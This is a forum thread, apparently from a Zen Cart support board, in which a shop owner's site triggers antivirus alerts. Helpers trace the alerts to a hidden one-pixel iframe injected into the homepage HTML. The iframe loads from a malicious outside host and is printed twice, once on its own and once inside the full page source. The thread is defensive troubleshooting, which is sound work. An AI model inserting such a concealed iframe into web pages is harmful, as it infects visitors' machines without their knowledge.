A VIRAL Problem!

[Big GEE]

Hello Everyone,

I've discovered a horrible problem with my unfinished "shop"
**link to site removed**

When viewed by IE on Win XP I get a viral warning from my AV software **link removed**

When viewed by Opera I get a message that tells me that http.....xbtuavnxbb.biz/dl/adv493.php can not be accessed. This is not a file on my site, I presume it's a "hijack" URL from a viral source.

In Firefox everything works fine! No warnings, no AV software intervention.

I've removed the virus (Hacktool.IE.Exploit) in the usual manner - switch off "restore" in XP, scan, delete file, reboot etc. etc. The AV software is not activated when I browse other sites using IE BUT as soon as I open my ZC Store page I immediately get the alert again.

Has anyone else encountered a similar problem? What's more, is this virus resident in the ZC files on my server?

Any ideas?

Many Thanks,

G

[DrByte]

That's a nasty one.....

Not sure where it's being triggered from, but here's a few ideas to check:
- iframe link:

Code:

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

- all your template images ... to be sure nothing's embedded
- your no-right-click javascript
- and your flash content .... and maybe also the OBJECT/EMBED code you're using to load/init the flash content.


(We deactivated the links in your post because they even caused the JS to start infecting our test machines....)

[DrByte]

I think it's the iframe code, based on this Googled result:

http://forums.startlogic.com/viewtopic.php?t=547

[DrByte]

yup -- and the iframe appears to be coming from your define-page-main code (see the last line here):

HTML Code:

<font color="#000080">
<img vspace="0" hspace="0" border="0" align="bottom" src="http://sccambria-online-linux-store.com/pics/thankyou_greeting.jpg" width="185" height="79"/></font></strong></font><p><strong>
<font size="3" color="#cc0000">
<span style="color: #000080;"><font face="Arial">If you're a </font>
</span> </font> <font style="font-family: Arial; " size="4">
L<font color="#FF0000">I</font>NUX</font><font size="4" color="#000080" style="font-family: Arial; font-weight: bold"> </font>
<font size="3" style="color: #000080;" face="Arial" color="#cc0000">enthusiast you'll find EVERYTHING you need right here - and at the most competitive prices available anywhere on the Internet. Many items (like programmes and utilities etc.) are <span style="font-style: italic;">ABSOLUTELY FREE!</span></font></strong></p>
<p><strong>
<font face="Arial" color="#ff3366"><font color="#000080">I</font><span style="color: #000080;">f you use one of the proprietary Operating System (like Microsoft) then there's still lots of HARDWARE, SOFTWARE and DOWNLOADS for you to choose from also. If you're thinking of migrating to  </span>
</font> <font style="font-family: Arial; " size="4">
L<font color="#FF0000">I</font>NUX</font><font face="Arial" color="#ff3366"><span style="color: #000080;"> then this is 
<i>DEFINITELY THE PLACE FOR YOU!</i></span><i><font color="#000080">
</font>
</i>
</font></strong></p>
<p><strong>
<font color="#000080" face="Arial">Whether you're looking for a LINSPIRE LINUX 
Distro or a &quot;READY TO GO&quot; pre-built and tested S.C.Cambria Desktop or Laptop 
Computer System - we have it all for you.</font></strong></p>
<p><strong>
<font color="#000080" face="Arial">All the hardware listed in our shop - which 
is available for immediate online purchase - has been fully tested and is 
compatible with the latest LINSPIRE 5.0 Desktop and Laptop Operating System. 
From a humble Mouse to a Wireless Server you'll find it ALL in our shop!Don't 
forget to check out our
</font>
</strong></p>
<p><font face="Arial"><a title="Goto our HOSTING PLANS info. page" href="http://www.sccambria.com/hosting_plans_comparison.htm" target="_blank"><strong>
<font color="#FF0000">WEB HOSTING PLANS</font></strong></a><font color="#000080">
</font>  <a href="http://www.sccambria.com/hosting_plans_comparison.htm">
<font color="#000080">
<a target="_blank" href="http://www.sccambria.com/hosting_plans_comparison.htm">
<img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a><font color="#000080">&nbsp;&nbsp;&nbsp;&nbsp;
<font size="4">&nbsp;</font></font><a title="See our WEB DESIGN SERVICE page" href="http://www.sccambria.com/webdesign.htm" target="_blank"><strong><font color="#FF0000">WEB-SITE DESIGN SERVICES</font></strong></a><font color="#000080">
</font></font> <a href="http://www.sccambria.com/webdesign.htm">
<font color="#000080">
<a target="_blank" href="http://www.sccambria.com/webdesign.htm">
<img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a></p><iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

[Big GEE]

You're a star DrByte!

Now you're going to have to pass this by me VERY slowly.

So (according to the last line in the copy of the code you showed in your last post) the offending code is contained in that line of my define-page-main code file. I.e. <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

If this is so then
a) Will deleting that section of spurious code rectify my problem?

b) Where did that information come from in the first place? Could it be the template I used? And

c) Why is the problem apparent in IE & Opera but not Firefox?

Thanks,

G

[xt0rt]

I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

Just seems a bit off...

[Big GEE]

IF I've read that thread on http://forums.startlogic.com/viewtopic.php?t=547 correctly then the problem could be with the server itself. I'm getting very jittery about this! I've got other sites on the same server.

If the spurious insert can get planted in one line of code what's stopping it happening to multiples of files? In which case it would be absolutely disasterous.

HELP!!!

G